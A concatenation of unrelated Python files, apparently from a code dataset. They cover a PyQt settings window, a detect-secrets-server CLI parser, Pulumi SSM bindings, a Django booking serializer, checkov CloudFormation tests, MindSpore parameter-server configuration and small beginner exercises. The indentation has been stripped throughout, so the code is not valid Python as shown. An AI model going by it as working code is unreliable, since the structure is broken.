self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName("verticalLayout")
self.scrollArea = QtWidgets.QScrollArea(self.centralwidget)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 780, 580))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.scrollAreaWidgetContents.sizePolicy().hasHeightForWidth())
self.scrollAreaWidgetContents.setSizePolicy(sizePolicy)
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.verticalLayout_3 = QtWidgets.QVBoxLayout()
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setSpacing(8)
self.gridLayout.setObjectName("gridLayout")
self.font_size_spin_box = QtWidgets.QSpinBox(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.font_size_spin_box.sizePolicy().hasHeightForWidth())
self.font_size_spin_box.setSizePolicy(sizePolicy)
self.font_size_spin_box.setMinimumSize(QtCore.QSize(60, 0))
self.font_size_spin_box.setMaximumSize(QtCore.QSize(60, 16777215))
self.font_size_spin_box.setStyleSheet("padding: 8px;")
self.font_size_spin_box.setMaximum(1638)
self.font_size_spin_box.setObjectName("font_size_spin_box")
self.gridLayout.addWidget(self.font_size_spin_box, 3, 1, 1, 1)
self.label_2 = QtWidgets.QLabel(self.scrollAreaWidgetContents)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 2, 3, 1, 1)
self.font_family_combo_box = QtWidgets.QFontComboBox(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.font_family_combo_box.sizePolicy().hasHeightForWidth())
self.font_family_combo_box.setSizePolicy(sizePolicy)
self.font_family_combo_box.setStyleSheet("padding: 8px;")
self.font_family_combo_box.setObjectName("font_family_combo_box")
self.gridLayout.addWidget(self.font_family_combo_box, 3, 0, 1, 1)
self.apply_button = QtWidgets.QPushButton(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.apply_button.sizePolicy().hasHeightForWidth())
self.apply_button.setSizePolicy(sizePolicy)
self.apply_button.setMinimumSize(QtCore.QSize(71, 0))
self.apply_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.apply_button.setStyleSheet("padding: 8px;")
self.apply_button.setObjectName("apply_button")
self.gridLayout.addWidget(self.apply_button, 1, 3, 1, 1)
self.margin_spin_box = QtWidgets.QSpinBox(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.margin_spin_box.sizePolicy().hasHeightForWidth())
self.margin_spin_box.setSizePolicy(sizePolicy)
self.margin_spin_box.setMinimumSize(QtCore.QSize(60, 0))
self.margin_spin_box.setMaximumSize(QtCore.QSize(60, 16777215))
self.margin_spin_box.setStyleSheet("padding: 8px;")
self.margin_spin_box.setMaximum(1000000)
self.margin_spin_box.setObjectName("margin_spin_box")
self.gridLayout.addWidget(self.margin_spin_box, 3, 3, 1, 1)
self.preview_text_line_edit = QtWidgets.QLineEdit(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.preview_text_line_edit.sizePolicy().hasHeightForWidth())
self.preview_text_line_edit.setSizePolicy(sizePolicy)
self.preview_text_line_edit.setStyleSheet("padding: 8px;")
self.preview_text_line_edit.setPlaceholderText("")
self.preview_text_line_edit.setObjectName("preview_text_line_edit")
self.gridLayout.addWidget(self.preview_text_line_edit, 1, 0, 1, 3)
self.label = QtWidgets.QLabel(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 2, 0, 1, 3)
self.change_color_button = QtWidgets.QPushButton(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.change_color_button.sizePolicy().hasHeightForWidth())
self.change_color_button.setSizePolicy(sizePolicy)
self.change_color_button.setMinimumSize(QtCore.QSize(24, 24))
self.change_color_button.setMaximumSize(QtCore.QSize(24, 24))
self.change_color_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.change_color_button.setStyleSheet("border-style: solid;\n"
"border-radius: 2px;\n"
"background-color: #ffffff;\n"
"border-color: black;\n"
"border-width: 1px;\n"
"")
self.change_color_button.setText("")
self.change_color_button.setObjectName("change_color_button")
self.gridLayout.addWidget(self.change_color_button, 3, 2, 1, 1)
self.verticalLayout_3.addLayout(self.gridLayout)
self.preview_label = QtWidgets.QLabel(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.preview_label.sizePolicy().hasHeightForWidth())
self.preview_label.setSizePolicy(sizePolicy)
self.preview_label.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setFamily("Arial")
font.setPointSize(20)
self.preview_label.setFont(font)
self.preview_label.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.preview_label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.preview_label.setStyleSheet("background-color: black;\n"
"color: white;\n"
"padding: 16px;")
self.preview_label.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.preview_label.setWordWrap(True)
self.preview_label.setObjectName("preview_label")
self.verticalLayout_3.addWidget(self.preview_label)
self.verticalLayout_2.addLayout(self.verticalLayout_3)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.verticalLayout.addWidget(self.scrollArea)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Configurações de projeção"))
self.label_2.setText(_translate("MainWindow", "Margem"))
self.apply_button.setText(_translate("MainWindow", "Aplicar"))
self.preview_text_line_edit.setText(_translate("MainWindow", "Texto de teste"))
self.label.setText(_translate("MainWindow", "Fonte:"))
self.preview_label.setText(_translate("MainWindow", "Texto de teste"))
|
nilq/baby-python
|
python
|
from __future__ import absolute_import
import argparse
from detect_secrets.core.usage import ParserBuilder
import detect_secrets_server
from .add import AddOptions
from .install import InstallOptions
from .list import ListOptions
from .scan import ScanOptions
class ServerParserBuilder(ParserBuilder):
"""Arguments, for the server component"""
def __init__(self):
super(ServerParserBuilder, self).__init__()
self._add_server_use_arguments()
def _add_version_argument(self):
"""Overridden, because we don't want to be showing the version
of detect-secrets plugin that we depend on.
"""
self.parser.add_argument(
'--version',
action='version',
version=detect_secrets_server.__version__,
help='Display version information.',
)
return self
def _add_server_use_arguments(self):
subparser = self.parser.add_subparsers(
dest='action',
)
for option in (AddOptions, ListOptions, InstallOptions, ScanOptions):
option(subparser).add_arguments()
return self
def parse_args(self, argv):
# NOTE: We can't just call `super`, because we need to parse the PluginOptions
# after we parse the config file, since we need to be able to distinguish
# between default values, and values that are set.
output = self.parser.parse_args(argv)
try:
if output.action == 'add':
AddOptions.consolidate_args(output)
if getattr(output, 'config', False):
apply_default_plugin_options_to_repos(output)
elif output.action == 'scan':
ScanOptions.consolidate_args(output)
elif output.action == 'install':
InstallOptions.consolidate_args(output)
elif output.action == 'list':
ListOptions.consolidate_args(output)
except argparse.ArgumentTypeError as e:
self.parser.error(e)
return output
def apply_default_plugin_options_to_repos(args):
"""
There are three ways to configure options (in order of priority):
1. command line
2. config file
3. default values
This applies default values to the config file, if appropriate.
"""
for tracked_repo in args.repo:
# TODO Issue 17: Not touching exclude_regex in repo metadata
# Just ignoring it for now and using the exclusion CLI args given when calling `scan`
# (This can be ignored because this function is only called by `add`)
for key in (
'baseline',
'crontab',
'exclude_regex',
'storage',
):
if key not in tracked_repo:
tracked_repo[key] = getattr(args, key)
if 'plugins' not in tracked_repo:
tracked_repo['plugins'] = {}
for key, value in args.plugins.items():
if key not in tracked_repo['plugins']:
tracked_repo['plugins'][key] = value
disabled_plugins = [
plugin_name
for plugin_name, value in tracked_repo['plugins'].items()
if value is False
]
for plugin_name in disabled_plugins:
del tracked_repo['plugins'][plugin_name]
if 'sha' not in tracked_repo:
tracked_repo['sha'] = ''
|
nilq/baby-python
|
python
|
from espnet_model_zoo.downloader import ModelDownloader
import sys
model_name = sys.argv[1]
d = ModelDownloader()
model_path = d.download(sys.argv[1])
print(model_path)
|
nilq/baby-python
|
python
|
larg = float(input('Qual a largura da parede?'))
alt = float(input('Qual a altura da parede?'))
print('Você vai precisar de {:.0f} litros de tinta'.format((larg*alt)/2))
|
nilq/baby-python
|
python
|
# Difficulty Level: Beginner
# Question: Calculate the sum of the values of keys a and b .
# d = {"a": 1, "b": 2, "c": 3}
# Expected output:
# 3
# Program
d = {"a": 1, "b": 2, "c": 3}
print(d["a"] + d["b"])
# Output
# shubhamvaishnav:python-bootcamp$ python3 17_dictionary_items_sum_up.py
# 3
|
nilq/baby-python
|
python
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
class Association(pulumi.CustomResource):
"""
Associates an SSM Document to an instance or EC2 tag.
"""
def __init__(__self__, __name__, __opts__=None, association_name=None, document_version=None, instance_id=None, name=None, output_location=None, parameters=None, schedule_expression=None, targets=None):
"""Create a Association resource with the given unique name, props, and options."""
if not __name__:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(__name__, basestring):
raise TypeError('Expected resource name to be a string')
if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if association_name and not isinstance(association_name, basestring):
raise TypeError('Expected property association_name to be a basestring')
__self__.association_name = association_name
"""
The descriptive name for the association.
"""
__props__['associationName'] = association_name
if document_version and not isinstance(document_version, basestring):
raise TypeError('Expected property document_version to be a basestring')
__self__.document_version = document_version
"""
The document version you want to associate with the target(s). Can be a specific version or the default version.
"""
__props__['documentVersion'] = document_version
if instance_id and not isinstance(instance_id, basestring):
raise TypeError('Expected property instance_id to be a basestring')
__self__.instance_id = instance_id
"""
The instance ID to apply an SSM document to. Use `targets` with key `InstanceIds` for document schema versions 2.0 and above.
"""
__props__['instanceId'] = instance_id
if name and not isinstance(name, basestring):
raise TypeError('Expected property name to be a basestring')
__self__.name = name
"""
The name of the SSM document to apply.
"""
__props__['name'] = name
if output_location and not isinstance(output_location, dict):
raise TypeError('Expected property output_location to be a dict')
__self__.output_location = output_location
"""
An output location block. Output Location is documented below.
"""
__props__['outputLocation'] = output_location
if parameters and not isinstance(parameters, dict):
raise TypeError('Expected property parameters to be a dict')
__self__.parameters = parameters
"""
A block of arbitrary string parameters to pass to the SSM document.
"""
__props__['parameters'] = parameters
if schedule_expression and not isinstance(schedule_expression, basestring):
raise TypeError('Expected property schedule_expression to be a basestring')
__self__.schedule_expression = schedule_expression
"""
A cron expression when the association will be applied to the target(s).
"""
__props__['scheduleExpression'] = schedule_expression
if targets and not isinstance(targets, list):
raise TypeError('Expected property targets to be a list')
__self__.targets = targets
"""
A block containing the targets of the SSM association. Targets are documented below. AWS currently supports a maximum of 5 targets.
"""
__props__['targets'] = targets
__self__.association_id = pulumi.runtime.UNKNOWN
super(Association, __self__).__init__(
'aws:ssm/association:Association',
__name__,
__props__,
__opts__)
def set_outputs(self, outs):
if 'associationId' in outs:
self.association_id = outs['associationId']
if 'associationName' in outs:
self.association_name = outs['associationName']
if 'documentVersion' in outs:
self.document_version = outs['documentVersion']
if 'instanceId' in outs:
self.instance_id = outs['instanceId']
if 'name' in outs:
self.name = outs['name']
if 'outputLocation' in outs:
self.output_location = outs['outputLocation']
if 'parameters' in outs:
self.parameters = outs['parameters']
if 'scheduleExpression' in outs:
self.schedule_expression = outs['scheduleExpression']
if 'targets' in outs:
self.targets = outs['targets']
|
nilq/baby-python
|
python
|
from django.db.models.query import Q
from django.utils import timezone
from rest_framework import serializers
from ..accounts.serializers import UserSerializer
from .models import Amenity, Booking
class AmenityRelatedField(serializers.RelatedField):
def to_native(self, value):
return {
'id': value.id,
'name': value.name,
}
class BookingSerializer(serializers.ModelSerializer):
resident = UserSerializer(read_only=True)
amenity_detail = AmenityRelatedField('amenity', read_only=True)
is_editable = serializers.SerializerMethodField('is_obj_editable')
is_removable = serializers.SerializerMethodField('is_obj_removable')
class Meta:
model = Booking
fields = ('id',
'resident',
'amenity',
'amenity_detail',
'reserved_from',
'reserved_to',
'is_editable',
'is_removable')
def is_obj_editable(self, obj):
return obj.has_permission(self.context['request'].user,
'amenities.change_booking')
def is_obj_removable(self, obj):
return obj.has_permission(self.context['request'].user,
'amenities.delete_booking')
def validate_amenity(self, attrs, source):
value = attrs[source]
if not value.is_available:
raise serializers.ValidationError("Amenity not available")
if not value in self.context['request'].building.amenity_set.all():
raise serializers.ValidationError("Amenity not found")
return attrs
def validate_reserved_from(self, attrs, source):
value = attrs[source]
if value < timezone.now():
raise serializers.ValidationError("'From' date must be in future")
return attrs
def validate(self, attrs):
if attrs['reserved_from'] > attrs['reserved_to']:
raise serializers.ValidationError(
"The 'from' date is after the 'to' date")
bookings = attrs['amenity'].booking_set.all()
date_range = (attrs['reserved_from'], attrs['reserved_to'])
qs = bookings.filter(
Q(reserved_from__range=date_range) |
Q(reserved_to__range=date_range))
booking_id = self.init_data.get('id')
if booking_id:
qs = qs.exclude(pk=booking_id)
if qs.exists():
raise serializers.ValidationError("Booking conflict")
return attrs
class AmenitySerializer(serializers.ModelSerializer):
class Meta:
model = Amenity
fields = ('id', 'name', 'is_available', )
|
nilq/baby-python
|
python
|
import os
from unittest import TestCase
from checkov.cloudformation.cfn_utils import create_definitions
from checkov.cloudformation.graph_builder.graph_components.block_types import BlockType
from checkov.cloudformation.graph_builder.graph_to_definitions import convert_graph_vertices_to_definitions
from checkov.cloudformation.graph_builder.local_graph import CloudformationLocalGraph
from checkov.cloudformation.parser import parse, TemplateSections
from checkov.runner_filter import RunnerFilter
TEST_DIRNAME = os.path.dirname(os.path.realpath(__file__))
class TestLocalGraph(TestCase):
def test_build_graph_with_single_resource(self):
relative_file_path = "../../checks/resource/aws/example_APIGatewayXray/APIGatewayXray-PASSED.yaml"
definitions = {}
file = os.path.realpath(os.path.join(TEST_DIRNAME, relative_file_path))
(definitions[relative_file_path], definitions_raw) = parse(file)
local_graph = CloudformationLocalGraph(definitions)
local_graph.build_graph(render_variables=False)
self.assertEqual(1, len(local_graph.vertices))
self.assertEqual(0, len(local_graph.edges))
resource_vertex = local_graph.vertices[0]
self.assertEqual("AWS::ApiGateway::Stage.MyStage", resource_vertex.name)
self.assertEqual("AWS::ApiGateway::Stage.MyStage", resource_vertex.id)
self.assertEqual(BlockType.RESOURCE, resource_vertex.block_type)
self.assertEqual("CloudFormation", resource_vertex.source)
self.assertDictEqual(definitions[relative_file_path]["Resources"]["MyStage"]["Properties"],
resource_vertex.attributes)
def test_build_graph_with_params_outputs(self):
relative_file_path = "../../checks/resource/aws/example_IAMRoleAllowAssumeFromAccount/example_IAMRoleAllowAssumeFromAccount-PASSED-2.yml"
definitions = {}
file = os.path.realpath(os.path.join(TEST_DIRNAME, relative_file_path))
(definitions[relative_file_path], definitions_raw) = parse(file)
local_graph = CloudformationLocalGraph(definitions)
local_graph.build_graph(render_variables=False)
self.assertEqual(len(local_graph.vertices), 57)
self.assertEqual(len([v for v in local_graph.vertices if v.block_type == BlockType.CONDITIONS]), 2)
self.assertEqual(len([v for v in local_graph.vertices if v.block_type == BlockType.RESOURCE]), 16)
self.assertEqual(len([v for v in local_graph.vertices if v.block_type == BlockType.PARAMETERS]), 30)
self.assertEqual(len([v for v in local_graph.vertices if v.block_type == BlockType.OUTPUTS]), 8)
self.assertEqual(len([v for v in local_graph.vertices if v.block_type == BlockType.MAPPINGS]), 1)
def test_vertices_from_local_graph(self):
resources_dir = os.path.realpath(os.path.join(TEST_DIRNAME, './resources/vertices'))
definitions, _ = create_definitions(root_folder=resources_dir, files=None, runner_filter=RunnerFilter())
local_graph = CloudformationLocalGraph(definitions)
local_graph.build_graph(render_variables=False)
definitions, breadcrumbs = convert_graph_vertices_to_definitions(local_graph.vertices, resources_dir)
self.assertIsNotNone(definitions)
self.assertEqual(len(definitions.items()), 2)
test_yaml_definitions = definitions[os.path.join(resources_dir, 'test.yaml')][TemplateSections.RESOURCES]
self.assertEqual(len(test_yaml_definitions.keys()), 2)
self.assertIn('MyDB', test_yaml_definitions.keys())
self.assertIn('MySourceQueue', test_yaml_definitions.keys())
test_json_definitions = definitions[os.path.join(resources_dir, 'test.json')][TemplateSections.RESOURCES]
self.assertEqual(len(test_json_definitions.keys()), 2)
self.assertIn('MyDB', test_json_definitions.keys())
self.assertIn('MySourceQueue', test_json_definitions.keys())
self.assertIsNotNone(breadcrumbs)
self.assertDictEqual(breadcrumbs, {}) # Will be changed when we add breadcrumbs to cfn vertices
def test_yaml_conditioned_vertices_from_local_graph(self):
root_dir = os.path.realpath(os.path.join(TEST_DIRNAME, './resources/conditioned_vertices/yaml'))
file_name = 'test.yaml'
self.validate_conditioned_vertices_from_local_graph(root_dir, file_name)
def test_json_conditioned_vertices_from_local_graph(self):
root_dir = os.path.realpath(os.path.join(TEST_DIRNAME, './resources/conditioned_vertices/json'))
file_name = 'test.json'
self.validate_conditioned_vertices_from_local_graph(root_dir, file_name)
def validate_conditioned_vertices_from_local_graph(self, root_dir, file_name):
true_condition_resources = {'BucketFnEqualsTrue', 'BucketFnNotTrue', 'BucketFnNotTrueThroughCondition',
'BucketFnAndTrue', 'BucketFnAndTrueWithCondition',
'BucketFnOrTrue', 'BucketFnOrTrueWithCondition'}
definitions, _ = create_definitions(root_folder=root_dir, files=None, runner_filter=RunnerFilter())
local_graph = CloudformationLocalGraph(definitions)
local_graph.build_graph(render_variables=True)
definitions, breadcrumbs = convert_graph_vertices_to_definitions(local_graph.vertices, root_dir)
self.assertIsNotNone(definitions)
self.assertEqual(len(definitions.items()), 1)
test_yaml_definitions = definitions[os.path.join(root_dir, file_name)][TemplateSections.RESOURCES]
definitions_set = set(test_yaml_definitions.keys())
self.assertEqual(len(definitions_set), 7)
self.assertSetEqual(true_condition_resources, definitions_set)
def test_yaml_edges(self):
root_dir = os.path.realpath(os.path.join(TEST_DIRNAME, 'resources/edges_yaml'))
self.validate_edges_count(root_dir)
def test_json_edges(self):
root_dir = os.path.realpath(os.path.join(TEST_DIRNAME, 'resources/edges_json'))
self.validate_edges_count(root_dir)
def validate_edges_count(self, root_dir) -> None:
expected_out_edges_count = {
'parameters.EnvType': 0,
'parameters.DataBucketName': 0,
'mappings.RegionMap': 0,
'conditions.CreateProdResources': 1,
'conditions.CreateDevResources': 1,
'AWS::EC2::Instance.EC2Instance': 4,
'AWS::EC2::VolumeAttachment.MountPoint': 3,
'AWS::EC2::Volume.NewVolume': 2,
'AWS::S3::Bucket.DataBucket': 4,
'outputs.EC2InstanceId': 1,
'outputs.EC2PublicDNS': 1,
'outputs.DataBucketUniqueId': 2
}
expected_in_edges_count = {
'parameters.EnvType': 4,
'parameters.DataBucketName': 3,
'mappings.RegionMap': 1,
'conditions.CreateProdResources': 3,
'conditions.CreateDevResources': 1,
'AWS::EC2::Instance.EC2Instance': 5,
'AWS::EC2::VolumeAttachment.MountPoint': 0,
'AWS::EC2::Volume.NewVolume': 1,
'AWS::S3::Bucket.DataBucket': 1,
'outputs.EC2InstanceId': 0,
'outputs.EC2PublicDNS': 0,
'outputs.DataBucketUniqueId': 0
}
definitions, _ = create_definitions(root_folder=root_dir, files=None, runner_filter=RunnerFilter())
local_graph = CloudformationLocalGraph(definitions)
local_graph.build_graph(render_variables=False)
idx_to_vertex_id = {idx: vertex.id for idx, vertex in enumerate(local_graph.vertices)}
# we check that each entity in the template file has the right amount of out edges_yaml
out_edges_overall_count = 0
for vertex_index, actual_out_edges in local_graph.out_edges.items():
vertex_id = idx_to_vertex_id[vertex_index]
self.assertEqual(len(actual_out_edges), expected_out_edges_count[vertex_id], f'{vertex_id} actually has {len(actual_out_edges)} outgoing edges, not {expected_out_edges_count[vertex_id]}')
out_edges_overall_count += len(actual_out_edges)
# we check that each entity in the template file has the right amount of in edges_yaml
in_edges_overall_count = 0
for vertex_index, actual_in_edges in local_graph.in_edges.items():
vertex_id = idx_to_vertex_id[vertex_index]
self.assertEqual(len(actual_in_edges), expected_in_edges_count[vertex_id], f'{vertex_id} actually has {len(actual_in_edges)} outgoing edges, not {expected_in_edges_count[vertex_id]}')
in_edges_overall_count += len(actual_in_edges)
# we check that the overall amount of out edges_yaml equals the overall amount of in edges_yaml
# and the overall amount of edges_yaml
self.assertEqual(out_edges_overall_count, in_edges_overall_count)
self.assertEqual(out_edges_overall_count, len(local_graph.edges))
|
nilq/baby-python
|
python
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Context for parameter server training mode"""
import os
from mindspore._checkparam import Validator
from mindspore._c_expression import PSContext
_ps_context = None
def ps_context():
"""
Get the global _ps_context, if it is not created, create a new one.
Returns:
_ps_context, the global parameter server training mode context.
"""
global _ps_context
if _ps_context is None:
_ps_context = PSContext.get_instance()
return _ps_context
_set_ps_context_func_map = {
"server_mode": ps_context().set_server_mode,
"ms_role": ps_context().set_ms_role,
"enable_ps": ps_context().set_ps_enable,
"enable_fl": ps_context().set_ps_enable,
"worker_num": ps_context().set_worker_num,
"server_num": ps_context().set_server_num,
"scheduler_ip": ps_context().set_scheduler_ip,
"scheduler_port": ps_context().set_scheduler_port,
"fl_server_port": ps_context().set_fl_server_port,
"enable_fl_client": ps_context().set_fl_client_enable,
"start_fl_job_threshold": ps_context().set_start_fl_job_threshold,
"start_fl_job_time_window": ps_context().set_start_fl_job_time_window,
"update_model_ratio": ps_context().set_update_model_ratio,
"update_model_time_window": ps_context().set_update_model_time_window,
"share_secrets_ratio": ps_context().set_share_secrets_ratio,
"cipher_time_window": ps_context().set_cipher_time_window,
"reconstruct_secrets_threshold": ps_context().set_reconstruct_secrets_threshold,
"fl_name": ps_context().set_fl_name,
"fl_iteration_num": ps_context().set_fl_iteration_num,
"client_epoch_num": ps_context().set_client_epoch_num,
"client_batch_size": ps_context().set_client_batch_size,
"client_learning_rate": ps_context().set_client_learning_rate,
"worker_step_num_per_iteration": ps_context().set_worker_step_num_per_iteration,
"root_first_ca_path": ps_context().set_root_first_ca_path,
"root_second_ca_path": ps_context().set_root_second_ca_path,
"pki_verify": ps_context().set_pki_verify,
"equip_crl_path": ps_context().set_equip_crl_path,
"replay_attack_time_diff": ps_context().set_replay_attack_time_diff,
"enable_ssl": ps_context().set_enable_ssl,
"client_password": ps_context().set_client_password,
"server_password": ps_context().set_server_password,
"scheduler_manage_port": ps_context().set_scheduler_manage_port,
"config_file_path": ps_context().set_config_file_path,
"dp_eps": ps_context().set_dp_eps,
"dp_delta": ps_context().set_dp_delta,
"dp_norm_clip": ps_context().set_dp_norm_clip,
"encrypt_type": ps_context().set_encrypt_type,
"http_url_prefix": ps_context().set_http_url_prefix,
"global_iteration_time_window": ps_context().set_global_iteration_time_window,
"sign_k": ps_context().set_sign_k,
"sign_eps": ps_context().set_sign_eps,
"sign_thr_ratio": ps_context().set_sign_thr_ratio,
"sign_global_lr": ps_context().set_sign_global_lr,
"sign_dim_out": ps_context().set_sign_dim_out
}
_get_ps_context_func_map = {
"server_mode": ps_context().server_mode,
"ms_role": ps_context().ms_role,
"enable_ps": ps_context().is_ps_mode,
"enable_fl": ps_context().is_ps_mode,
"worker_num": ps_context().worker_num,
"server_num": ps_context().server_num,
"scheduler_ip": ps_context().scheduler_ip,
"scheduler_port": ps_context().scheduler_port,
"fl_server_port": ps_context().fl_server_port,
"enable_fl_client": ps_context().fl_client_enable,
"start_fl_job_threshold": ps_context().start_fl_job_threshold,
"start_fl_job_time_window": ps_context().start_fl_job_time_window,
"update_model_ratio": ps_context().update_model_ratio,
"update_model_time_window": ps_context().update_model_time_window,
"share_secrets_ratio": ps_context().share_secrets_ratio,
"cipher_time_window": ps_context().cipher_time_window,
"reconstruct_secrets_threshold": ps_context().reconstruct_secrets_threshold,
"fl_name": ps_context().fl_name,
"fl_iteration_num": ps_context().fl_iteration_num,
"client_epoch_num": ps_context().client_epoch_num,
"client_batch_size": ps_context().client_batch_size,
"client_learning_rate": ps_context().client_learning_rate,
"worker_step_num_per_iteration": ps_context().worker_step_num_per_iteration,
"dp_eps": ps_context().dp_eps,
"dp_delta": ps_context().dp_delta,
"dp_norm_clip": ps_context().dp_norm_clip,
"encrypt_type": ps_context().encrypt_type,
"root_first_ca_path": ps_context().root_first_ca_path,
"root_second_ca_path": ps_context().root_second_ca_path,
"pki_verify": ps_context().pki_verify,
"equip_crl_path": ps_context().equip_crl_path,
"replay_attack_time_diff": ps_context().replay_attack_time_diff,
"enable_ssl": ps_context().enable_ssl,
"client_password": ps_context().client_password,
"server_password": ps_context().server_password,
"scheduler_manage_port": ps_context().scheduler_manage_port,
"config_file_path": ps_context().config_file_path,
"http_url_prefix": ps_context().http_url_prefix,
"global_iteration_time_window": ps_context().global_iteration_time_window,
"sign_k": ps_context().sign_k,
"sign_eps": ps_context().sign_eps,
"sign_thr_ratio": ps_context().sign_thr_ratio,
"sign_global_lr": ps_context().sign_global_lr,
"sign_dim_out": ps_context().sign_dim_out
}
_check_positive_int_keys = ["server_num", "scheduler_port", "fl_server_port",
"start_fl_job_threshold", "start_fl_job_time_window", "update_model_time_window",
"fl_iteration_num", "client_epoch_num", "client_batch_size", "cipher_time_window",
"reconstruct_secrets_threshold"]
_check_non_negative_int_keys = ["worker_num"]
_check_positive_float_keys = ["update_model_ratio", "client_learning_rate"]
_check_port_keys = ["scheduler_port", "fl_server_port"]
def _get_ps_mode_rank():
ps_rank = ps_context().ps_rank_id()
if ps_rank == -1:
raise RuntimeError("The parameter server mode training is not enabled yet.")
return ps_rank
def _set_ps_context(**kwargs):
"""
Set parameter server training mode context.
Note:
Some other environment variables should also be set for parameter server training mode.
These environment variables are listed below:
.. code-block::
MS_SERVER_NUM # Server number
MS_WORKER_NUM # Worker number
MS_SCHED_HOST # Scheduler IP address
MS_SCHED_PORT # Scheduler port
MS_ROLE # The role of this process:
# MS_SCHED represents the scheduler,
# MS_WORKER represents the worker,
# MS_PSERVER represents the Server
Args:
enable_ps (bool): Whether to enable parameter server training mode.
Only after enable_ps is set True, the environment variables will be effective.
Default: False.
config_file_path (string): Configuration file path used by recovery. Default: ''.
scheduler_manage_port (int): scheduler manage port used to scale out/in. Default: 11202.
enable_ssl (bool): Set PS SSL mode enabled or disabled. Default: False.
client_password (str): Password to decrypt the secret key stored in the client certificate. Default: ''.
server_password (str): Password to decrypt the secret key stored in the server certificate. Default: ''.
Raises:
ValueError: If input key is not the attribute in parameter server training mode context.
Examples:
>>> context.set_ps_context(enable_ps=True, enable_ssl=True, client_password='123456', server_password='123456')
"""
for key, value in kwargs.items():
if key not in _set_ps_context_func_map:
raise ValueError("Set PS context keyword %s is not recognized!" % key)
_check_value(key, value)
set_func = _set_ps_context_func_map[key]
set_func(value)
def _get_ps_context(attr_key):
"""
Get parameter server training mode context attribute value according to the key.
Args:
attr_key (str): The key of the attribute.
Returns:
